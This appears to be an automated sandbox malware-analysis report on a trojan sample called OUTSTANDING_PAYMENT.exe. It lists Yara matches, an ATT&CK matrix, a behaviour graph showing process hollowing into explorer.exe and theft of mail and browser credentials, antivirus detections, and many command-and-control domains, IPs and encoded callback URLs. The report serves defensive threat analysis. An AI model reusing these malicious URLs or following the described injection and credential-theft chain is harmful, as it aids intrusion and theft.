          Source: Yara match | File source: 00000002.00000002.303713415.0000000000F30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.778084369.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000D.00000002.777503905.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.303334914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000002.00000002.303576938.0000000000DB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          ATT&CK matrix (numbers in parentheses are the badges attached to matched techniques in the original matrix):

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Native API (12) | Path Interception | Access Token Manipulation (1) | Deobfuscate/Decode Files or Information (1) | OS Credential Dumping (1) | System Time Discovery (1) | Remote Services | Archive Collected Data (1) | Exfiltration Over Other Network Medium | Ingress Tool Transfer (3) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
          Default Accounts | Shared Modules (1) | Boot or Logon Initialization Scripts | Process Injection (512) | Obfuscated Files or Information (2) | LSASS Memory | File and Directory Discovery (2) | Remote Desktop Protocol | Data from Local System (1) | Exfiltration Over Bluetooth | Encrypted Channel (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Software Packing (1) | Security Account Manager | System Information Discovery (16) | SMB/Windows Admin Shares | Email Collection (1) | Automated Exfiltration | Non-Application Layer Protocol (4) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Masquerading (1) | NTDS | Security Software Discovery (141) | Distributed Component Object Model | Clipboard Data (1) | Scheduled Transfer | Application Layer Protocol (14) | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Virtualization/Sandbox Evasion (2) | LSA Secrets | Virtualization/Sandbox Evasion (2) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Access Token Manipulation (1) | Cached Domain Credentials | Process Discovery (2) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Process Injection (512) | DCSync | Application Window Discovery (1) | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Rundll32 (1) | Proc Filesystem | Remote System Discovery (1) | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 830322 | Sample: OUTSTANDING_PAYMENT.exe | Startdate: 20/03/2023 | Architecture: WINDOWS | Score: 100

Start node signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 6 other signatures

• OUTSTANDING_PAYMENT.exe (started)
  • dropped: C:\Users\user\AppData\Local\Temp\qhcqh.exe, PE32
  • started: qhcqh.exe
• qhcqh.exe (first instance)
  • signatures: Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors); Maps a DLL or memory area into another process
  • started: qhcqh.exe (second instance)
• qhcqh.exe (second instance)
  • signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
  • injected: explorer.exe
• explorer.exe (injected)
  • signatures: System process connects to network (likely due to code injection or exploit)
  • DNS/IP: www.mynichemarket.co.uk 185.151.30.181, ports 49709, 49710, 49711, TWENTYIGB, United Kingdom; www.landlotto.ru 109.70.26.37, ports 49712, 49713, 49714, RU-CENTERRU, Russian Federation; 18 other IPs or domains
  • started: rundll32.exe
• rundll32.exe
  • signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process

Source | Detection | Scanner | Label
OUTSTANDING_PAYMENT.exe | 72% | ReversingLabs | Win32.Trojan.Leonem
OUTSTANDING_PAYMENT.exe | 72% | Virustotal |
OUTSTANDING_PAYMENT.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\qhcqh.exe | 51% | ReversingLabs | Win32.Trojan.Tnega
Source | Detection | Scanner | Label
13.2.rundll32.exe.4f53814.4.unpack | 100% | Avira | TR/Patched.Ren.Gen
2.2.qhcqh.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.2.qhcqh.exe.980000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
13.2.rundll32.exe.30544f8.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.OUTSTANDING_PAYMENT.exe.28ebe10.1.unpack | 100% | Avira | TR/Patched.Ren.Gen
Source | Detection | Scanner | Label
dirdikyepedia.com | 9% | Virustotal |
allison2patrick.online | 6% | Virustotal |
www.gorwly.top | 3% | Virustotal |
glb-mobility.com | 3% | Virustotal |
Source | Detection | Scanner | Label
http://www.karlscurry.co.uk/0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d2 | 0% | Avira URL Cloud | safe
http://www.hudsonandbailey.uk | 0% | Avira URL Cloud | safe
http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2 | 100% | Avira URL Cloud | malware
http://www.g2fm.co.uk/0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d2 | 0% | Avira URL Cloud | safe
http://www.karlscurry.co.uk/0oqq/ | 0% | Avira URL Cloud | safe
http://www.dirdikyepedia.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA== | 100% | Avira URL Cloud | malware
http://www.ty23vip.com/0oqq/qt9TW=60_ljPJoqo6d2 | 0% | Avira URL Cloud | safe
http://www.fanversewallet.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g== | 100% | Avira URL Cloud | malware
http://www.thelastwill.net/0oqq/ | 0% | Avira URL Cloud | safe
http://www.mynichemarket.co.uk/0oqq/ | 0% | Avira URL Cloud | safe
http://www.glb-mobility.com | 0% | Avira URL Cloud | safe
http://www.thelastwill.net/0oqq/qt9TW=60_ljPJoqo6d2 | 0% | Avira URL Cloud | safe
http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2 | 100% | Avira URL Cloud | malware
http://www.brennmansoluciones.com | 0% | Avira URL Cloud | safe
http://www.glb-mobility.com/0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d2 | 0% | Avira URL Cloud | safe
http://www.allison2patrick.online/0oqq/ | 100% | Avira URL Cloud | malware
http://www.karlscurry.co.uk | 0% | Avira URL Cloud | safe
http://www.glb-mobility.com/0oqq/ | 0% | Avira URL Cloud | safe
http://www.g2fm.co.uk/0oqq/ | 0% | Avira URL Cloud | safe
http://www.thelastwill.net | 0% | Avira URL Cloud | safe
http://www.sexopornoxx.store/0oqq/ | 100% | Avira URL Cloud | malware
http://www.thebang.sbs | 0% | Avira URL Cloud | safe
http://www.ty23vip.com/0oqq/ | 0% | Avira URL Cloud | safe
http://www.fanversewallet.com/0oqq/ | 100% | Avira URL Cloud | malware
http://www.ketoibabal.cyou/0oqq/ | 0% | Avira URL Cloud | safe
http://www.ty23vip.com | 0% | Avira URL Cloud | safe
http://www.landlotto.ru/0oqq/ | 100% | Avira URL Cloud | malware
https://tiao2022.vip:12306/?u= | 0% | Avira URL Cloud | safe
http://www.gorwly.top | 100% | Avira URL Cloud | malware
http://www.mynichemarket.co.uk | 0% | Avira URL Cloud | safe
http://www.dirdikyepedia.com/0oqq/ | 100% | Avira URL Cloud | malware
http://www.themssterofssuepnse.rest | 100% | Avira URL Cloud | malware
http://www.karlscurry.co.uk/0oqq/qt9TW=60_ljPJoqo6d2 | 0% | Avira URL Cloud | safe
http://www.fanversewallet.com | 100% | Avira URL Cloud | malware
http://www.allison2patrick.online | 0% | Avira URL Cloud | safe
http://www.brennmansoluciones.com/0oqq/qt9TW=60_ljPJoqo6d2 | 0% | Avira URL Cloud | safe
http://www.leewanyam.com/0oqq/poIb=tYchV8 | 0% | Avira URL Cloud | safe
http://www.brennmansoluciones.com/0oqq/ | 0% | Avira URL Cloud | safe
http://www.gorwly.top/0oqq/ | 100% | Avira URL Cloud | malware
http://www.glb-mobility.com/0oqq/qt9TW=60_ljPJoqo6d2 | 0% | Avira URL Cloud | safe
http://www.brennmansoluciones.com/0oqq/poIb=tYchV8 | 0% | Avira URL Cloud | safe
http://www.mynichemarket.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA== | 0% | Avira URL Cloud | safe
http://www.leewanyam.com/0oqq/ | 0% | Avira URL Cloud | safe
https://www.fasthosts.co.uk/domain-names/search/?domain=$ | 0% | Avira URL Cloud | safe
https://fasthosts.co.uk/ | 0% | Avira URL Cloud | safe
http://www.themssterofssuepnse.rest/0oqq/ | 100% | Avira URL Cloud | malware
http://www.landlotto.ru/0oqq/qt9TW=60_ljPJoqo6d2 | 100% | Avira URL Cloud | malware
http://www.mynichemarket.co.uk/0oqq/qt9TW=60_ljPJoqo6d2 | 0% | Avira URL Cloud | safe
http://www.ketoibabal.cyou | 0% | Avira URL Cloud | safe
https://www.fasthosts.co.uk/get-online?utm_source=domainparking&utm_medium=referral&utm_campaign=fh_ | 0% | Avira URL Cloud | safe
http://www.virginhairweave.co.uk/0oqq/ | 0% | Avira URL Cloud | safe
http://www.themssterofssuepnse.rest/0oqq/poIb=tYchV8 | 100% | Avira URL Cloud | malware
http://www.ketoibabal.cyou/0oqq/qt9TW=60_ljPJoqo6d2 | 0% | Avira URL Cloud | safe
http://www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2 | 100% | Avira URL Cloud | malware
http://www.hudsonandbailey.uk/0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 | 100% | Avira URL Cloud | malware
http://www.virginhairweave.co.uk | 0% | Avira URL Cloud | safe
http://www.virginhairweave.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== | 0% | Avira URL Cloud | safe
http://www.allison2patrick.online/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA== | 100% | Avira URL Cloud | malware
http://www.themssterofssuepnse.rest/0oqq/qt9TW=60_ljPJoqo6d2 | 100% | Avira URL Cloud | malware
http://www.g2fm.co.uk | 0% | Avira URL Cloud | safe
http://www.landlotto.ru | 100% | Avira URL Cloud | malware
http://www.hudsonandbailey.uk/0oqq/ | 100% | Avira URL Cloud | malware
Name | IP | Active | Malicious | Antivirus Detection | Reputation
dirdikyepedia.com | 5.181.216.141 | true | true | | unknown
allison2patrick.online | 62.4.21.190 | true | true | | unknown
www.gorwly.top | 192.64.116.162 | true | true | | unknown
glb-mobility.com | 88.99.217.197 | true | true | | unknown
www.hudsonandbailey.uk | 199.59.243.223 | true | true | | unknown
www.virginhairweave.co.uk | 198.58.118.167 | true | true | | unknown
www.g2fm.co.uk | 213.171.195.105 | true | true | | unknown
www.landlotto.ru | 109.70.26.37 | true | true | | unknown
www.karlscurry.co.uk | 217.160.0.249 | true | true | | unknown
www.ty23vip.com | 162.209.159.142 | true | true | | unknown
fanversewallet.com | 203.245.24.47 | true | true | | unknown
www.mynichemarket.co.uk | 185.151.30.181 | true | true | | unknown
www.themssterofssuepnse.rest | unknown | unknown | true | | unknown
www.glb-mobility.com | unknown | unknown | true | | unknown
www.fanversewallet.com | unknown | unknown | true | | unknown
www.ketoibabal.cyou | unknown | unknown | true | | unknown
www.allison2patrick.online | unknown | unknown | true | | unknown
www.brennmansoluciones.com | unknown | unknown | true | | unknown
www.dirdikyepedia.com | unknown | unknown | true | | unknown
www.thelastwill.net | unknown | unknown | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
http://www.g2fm.co.uk/0oqq/?ICHyvj5=mrlIldvmtur7mkt/rPLDu6zCaW7pq/FSfCj+/pKGfo5WkxwIgZbXON4VpSp8r5ryJHF0PKr2dhp3lAxH7D3LGu58YX7EcXy0Ow==&qt9TW=60_ljPJoqo6d2 | true | Avira URL Cloud: safe | unknown
http://www.fanversewallet.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=Yikzj9CFq5vqEc2vNlbzxihd8s3DrMcGxuzxagcCy5X6CzTVIy/a14lT5vlHy5RQ1Z7Px0aDVF6+DD/SwGM+3qMYWad3MBh6/g== | true | Avira URL Cloud: malware | unknown
http://www.karlscurry.co.uk/0oqq/ | true | Avira URL Cloud: safe | unknown
http://www.karlscurry.co.uk/0oqq/?ICHyvj5=/wt4JY4W3l+DpUlEm50j75nj98dXbWC1Jam/Xyx5jEHfTH+E1ePLpr1g8eshFzfVb4/25r9KS6bvXq1NrjcG6ioEuox+na//qA==&qt9TW=60_ljPJoqo6d2 | true | Avira URL Cloud: safe | unknown
http://www.dirdikyepedia.com/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=PRQC41TmcI9bvUwILfW251fDqJjDWsulERfzYnlMN4HgHjqryKViH0BFVe/NE6lVKE81tYv052d7aHxIDF6KpDCDELCE9pYayA== | true | Avira URL Cloud: malware | unknown
http://www.mynichemarket.co.uk/0oqq/ | true | Avira URL Cloud: safe | unknown
http://www.glb-mobility.com/0oqq/?ICHyvj5=L0mSdT0ooJoC+WTAff+ZGzvWM+chwjv3Dy0WIeNakQkmi/ixITEkKFHCL0Q8UzGKK5QpSY+AVQ3IyxgaFTuxUTcmK0rro2dEnw==&qt9TW=60_ljPJoqo6d2 | true | Avira URL Cloud: safe | unknown
http://www.allison2patrick.online/0oqq/ | true | Avira URL Cloud: malware | unknown
http://www.glb-mobility.com/0oqq/ | true | Avira URL Cloud: safe | unknown
http://www.g2fm.co.uk/0oqq/ | true | Avira URL Cloud: safe | unknown
http://www.fanversewallet.com/0oqq/ | true | Avira URL Cloud: malware | unknown
http://www.landlotto.ru/0oqq/ | true | Avira URL Cloud: malware | unknown
http://www.dirdikyepedia.com/0oqq/ | true | Avira URL Cloud: malware | unknown
http://www.gorwly.top/0oqq/ | true | Avira URL Cloud: malware | unknown
http://www.mynichemarket.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=bPiAqCboB3xuuR9jBd2d5kx4kdlhaJ3zm41TCptSu6I9zHYblFc2aOuFx07ZodW9tNkBHFGkWniHGpAg445zXTdag0fAcLuZfA== | true | Avira URL Cloud: safe | unknown
http://www.virginhairweave.co.uk/0oqq/ | true | Avira URL Cloud: safe | unknown
http://www.landlotto.ru/0oqq/?ICHyvj5=zVtcFUb2erpe1riHNV8x4uTJHdjXeMKlBrPOkTLBlxKebXbCPRW4F79HIT/4WhPpl+5XC4kkcR4ywvq/sd7+lksDMuqQ2YrnfA==&qt9TW=60_ljPJoqo6d2 | true | Avira URL Cloud: malware | unknown
http://www.hudsonandbailey.uk/0oqq/?ICHyvj5=8lDg7smsrRHQ2qUpjxtX5vXhip5hsKbS8bjyUsS5uXhQwZhytHa5U2zriYWyog0tbgqTaVuvH+VyL3+e5fQfLE/J79Vj0e1H5A==&qt9TW=60_ljPJoqo6d2 | true | Avira URL Cloud: malware | unknown
http://www.virginhairweave.co.uk/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=uTgIqe0UraKbEL8bVan9urdYcpPucjhGk2sL3YY9ls8dblQwqoiZoebTO/nXMXVf1qLfWs/b3Kzx4hfR3b8+tPCCgrVHYEBTbA== | true | Avira URL Cloud: safe | unknown
http://www.allison2patrick.online/0oqq/?qt9TW=60_ljPJoqo6d2&ICHyvj5=+kFy7HAJLaaTMVi2uF0rU22efsuYGHBQaVugoRnSwIkO/2Cyn5VxSDOnkUbRzJjMahwif1zr/P1d/M6VqUD0f3xgTygnYxnqIA== | true | Avira URL Cloud: malware | unknown
http://www.hudsonandbailey.uk/0oqq/ | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.dr | false | | high
https://www.nic.ru/catalog/mail/on-domain/?ipartner=6666&adv_id=click_mail&utm_source=stpg_all&utm_m | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | 81EFaKSJ3.13.dr | false | | high
http://www.ty23vip.com/0oqq/ | explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fanversewallet.com/0oqq/qt9TW=60_ljPJoqo6d2 | explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
http://www.ketoibabal.cyou/0oqq/ | explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.nic.ru/catalog/ssl/ | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://www.nic.ru/catalog/sites/sitebuilder/ | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://www.nic.ru/catalog/domains/ru/ | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://nic.ru/images/w8/win8transp.png | rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.hudsonandbailey.uk | explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ty23vip.com/0oqq/qt9TW=60_ljPJoqo6d2 | explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.glb-mobility.com | explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.google.com | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.00000000054A8000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://nic.ru/ | rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://www.nic.ru/catalog/domains/ | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.thelastwill.net/0oqq/ | explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.nic.ru/whois/?searchWord=LANDLOTTO.RU&ipartner=6666&adv_id=whois_info&utm_source=stpg_al | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.thelastwill.net/0oqq/qt9TW=60_ljPJoqo6d2 | explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.gorwly.top/0oqq/qt9TW=60_ljPJoqo6d2 | explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | rundll32.exe, 0000000D.00000002.781120791.0000000005FA6000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.brennmansoluciones.com | explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.nic.ru/catalog/mail/on-domain/ | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.karlscurry.co.uk | explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.nic.ru/product/mail/forward/?ipartner=6666&adv_id=click_mail_forward&utm_source=stpg_all | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://www.nic.ru/help/statusnaya-stranica_4785.html?ipartner=6666&adv_id=faq&utm_source=stpg_all&u | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.thelastwill.net | explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.nic.ru/catalog/domains/rf/ | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.thebang.sbs | explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.nic.ru/auction/ | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://www.sexopornoxx.store/0oqq/ | explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.ty23vip.com | explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 81EFaKSJ3.13.dr | false | | high
https://www.nic.ru/catalog/hosting/dedicated/ | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.nic.ru/catalog/sites/sitebuilder/?ipartner=6666&adv_id=click_sitebuild&utm_source=stpg_a | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
http://nsis.sf.net/NSIS_ErrorError | OUTSTANDING_PAYMENT.exe | false | | high
https://www.nic.ru/catalog/domains/com/ | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://tiao2022.vip:12306/?u= | rundll32.exe, 0000000D.00000002.781120791.000000000645C000.00000004.10000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://www.nic.ru/product/for-domain-use/web-forwarding/?ipartner=6666&adv_id=click_domain_forward& | rundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmp | false | | high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command= | rundll32.exe, 0000000D.00000002.778376326.000000000310F000.00000004.00000020.00020000.00000000.sdmp, 81EFaKSJ3.13.dr | false | | high
http://www.gorwly.top | explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://www.mynichemarket.co.uk | explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.themssterofssuepnse.rest | explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: malware |
                                                                                          unknown
                                                                                          http://www.fanversewallet.comexplorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          • Avira URL Cloud: malware
                                                                                          unknown
                                                                                          https://www.nic.ru/opensearch.xmlrundll32.exe, 0000000D.00000002.781664990.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://storage.nic.ru/ru/images/png/1.rc-logo-og.pngrundll32.exe, 0000000D.00000002.781120791.0000000005E14000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://www.brennmansoluciones.com/0oqq/qt9TW=60_ljPJoqo6d2explorer.exe, 00000003.00000002.791524546.000000000F52A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.473077921.000000000F51E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.475275139.000000000F527000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.670569523.000000000F527000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
